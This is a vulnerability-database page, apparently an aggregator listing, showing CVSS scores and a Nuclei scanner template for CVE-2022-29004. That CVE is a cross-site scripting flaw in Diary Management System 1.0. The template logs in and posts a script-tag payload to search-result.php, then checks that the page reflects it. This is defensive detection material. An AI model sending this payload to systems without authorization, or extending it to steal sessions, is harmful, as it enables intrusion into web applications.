Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-29004
HistorySep 01, 2022 - 12:51 p.m.

Diary Management System 1.0 - Cross-Site Scripting

2022-09-0112:51:44
ProjectDiscovery
github.com
2
cve-2022-29004
cross-site scripting
verified
authenticated
e-diary_management_system
phpgurukul

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.003

Percentile

65.4%

Diary Management System 1.0 contains a cross-site scripting vulnerability via the Name parameter in search-result.php.
id: CVE-2022-29004

info:
  name: Diary Management System 1.0 - Cross-Site Scripting
  author: TenBird
  severity: medium
  description: |
    Diary Management System 1.0 contains a cross-site scripting vulnerability via the Name parameter in search-result.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
  reference:
    - https://github.com/sudoninja-noob/CVE-2022-29004/blob/main/CVE-2022-29004.txt
    - https://phpgurukul.com/e-diary-management-system-using-php-and-mysql/
    - http://phpgurukul.com
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29004
    - https://github.com/manas3c/CVE-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-29004
    cwe-id: CWE-79
    epss-score: 0.00254
    epss-percentile: 0.65186
    cpe: cpe:2.3:a:phpgurukul:e-diary_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: phpgurukul
    product: e-diary_management_system
  tags: cve2022,cve,xss,authenticated,edms,phpgurukul

http:
  - raw:
      - |
        POST /edms/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        logindetail={{username}}&userpassword={{password}}&login=
      - |
        POST /edms/search-result.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        searchdata=<script>alert(document.domain);</script>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Serach Result Against "<script>alert(document.domain);</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009b66799841a5620fc96b4e17cc465b017f69905afc9125aebd6e1c3d2642509f0220700182ede207e46171582ad84a1ae1bcb553d33b160b8f347d0c6d9441057b72:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.003

Percentile

65.4%

Related for NUCLEI:CVE-2022-29004